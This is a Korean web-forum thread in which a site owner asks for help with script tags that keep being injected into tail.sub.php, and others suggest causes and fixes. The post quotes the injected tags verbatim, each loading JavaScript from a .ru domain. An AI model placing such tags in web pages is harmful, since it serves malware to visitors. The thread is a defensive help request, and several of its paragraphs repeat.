홈페이지에 멀웨어로 알려진 링크가 삽입 됩니다. 정보
홈페이지에 멀웨어로 알려진 링크가 삽입 됩니다.본문
홈페이지 방문시 바이러스 프로그램에서 멀웨어 경고를 나타내고
구글 검색엔진에서도 "이 사이트는 컴퓨터에 문제를 야기할 수 있습니다." 로 나타납니다.
이유는 주기적으로 tail.sub.php 파일에 아래와 같은 소스가 자동으로 삽입이 되더군요.
<script src=http://www.okcd.ru/js.js></script>
<script src=http://www.jic2.ru/script.js></script>
<script src=http://www.vtg43.ru/script.js</script>
지금까지는 계속 직접 확인하여 위의 추가된 부분을 삭제 했는데요,
차단하는 방법이 있는지 고수님들께 문의 드려봅니다.
SQL Injection 에 대한 부분을 찾아 보긴했는데..제 지식으론 도저히 알수가 없네요
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
구글 검색엔진에서도 "이 사이트는 컴퓨터에 문제를 야기할 수 있습니다." 로 나타납니다.
이유는 주기적으로 tail.sub.php 파일에 아래와 같은 소스가 자동으로 삽입이 되더군요.
<script src=http://www.okcd.ru/js.js></script>
<script src=http://www.jic2.ru/script.js></script>
<script src=http://www.vtg43.ru/script.js</script>
지금까지는 계속 직접 확인하여 위의 추가된 부분을 삭제 했는데요,
차단하는 방법이 있는지 고수님들께 문의 드려봅니다.
SQL Injection 에 대한 부분을 찾아 보긴했는데..제 지식으론 도저히 알수가 없네요
http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx
댓글 전체
해킹의 소지가 크네요. php파일 변경까지 이루어 진다는 점으로는 문제의 파일이 이미 사이트 안에 있다는 걸 생각할 수 있네요. data폴더내에 혹 의심가는 파일들이 있는지 확인하시고 또 파일 업로드시 파일 확장자에 제한을 거셨는지 확인해 보세요.
답변 감사드립니다. ^^
data 폴더를 확인해 봤는데 디렉토리 이외의 파일들은 없었고요, data 하위 디렉토리 file 디렉토리 내에도 문서파일 이외는(제 홈피가 문서파일만 다루고 있거든요) 의심가는 파일이 없었습니다.
파일 확장자에 제한을 두진 않았지만 회원제로 운영하고 관리자 권한으로만 파일 업로드를 할 수 있게 했고요.
그 사이에 또 새로운 링크가 tail.sub.php 에 삽입이 되었는데 참 난감하네요. 어떻게 처리를 해야할지...
<script language="javascript" src="<?=$g4['path']?>/js/wrest.js"></script>
<!-- 새창 대신 사용하는 iframe -->
<iframe width=0 height=0 name='hiddenframe' style='display:none;'></iframe>
<? if ($is_admin == "super") { ?><!-- <div style='float:left; width:<?=$table_width?>px; text-align:center;'>RUN TIME : <?=get_microtime()-$begin_time;?><br></div> --><? } ?>
<script src=http://www.pkseio.ru/script.js></script> <== 항상 이 부분에 삽입이 됩니다.
</body>
</html>
data 폴더를 확인해 봤는데 디렉토리 이외의 파일들은 없었고요, data 하위 디렉토리 file 디렉토리 내에도 문서파일 이외는(제 홈피가 문서파일만 다루고 있거든요) 의심가는 파일이 없었습니다.
파일 확장자에 제한을 두진 않았지만 회원제로 운영하고 관리자 권한으로만 파일 업로드를 할 수 있게 했고요.
그 사이에 또 새로운 링크가 tail.sub.php 에 삽입이 되었는데 참 난감하네요. 어떻게 처리를 해야할지...
<script language="javascript" src="<?=$g4['path']?>/js/wrest.js"></script>
<!-- 새창 대신 사용하는 iframe -->
<iframe width=0 height=0 name='hiddenframe' style='display:none;'></iframe>
<? if ($is_admin == "super") { ?><!-- <div style='float:left; width:<?=$table_width?>px; text-align:center;'>RUN TIME : <?=get_microtime()-$begin_time;?><br></div> --><? } ?>
<script src=http://www.pkseio.ru/script.js></script> <== 항상 이 부분에 삽입이 됩니다.
</body>
</html>
호스팅 사이트에 문의하세요. sql injecting 공격일 수도 있지만 가능성은 적은 것 같구요, 스크립트 파일에 의해 자동적으로 실행되는 것같아 보이므로 문제의 파일이 서버내에 있을 수 있습니다.
해결책은 아니고...
tail.sub.php 권한을 읽기만(404) 주면 어떻게 되나요?
tail.sub.php 권한을 읽기만(404) 주면 어떻게 되나요?
답변 정말 감사드립니다. 아무래도 말씀 하신 것 처럼 호스팅 사이트에 문의해 봐야겠네요.
그 이전에 균이님 말씀대로 권한을 한번 404 로 변경하고 결과를 기다려 보겠습니다.
그 이전에 균이님 말씀대로 권한을 한번 404 로 변경하고 결과를 기다려 보겠습니다.
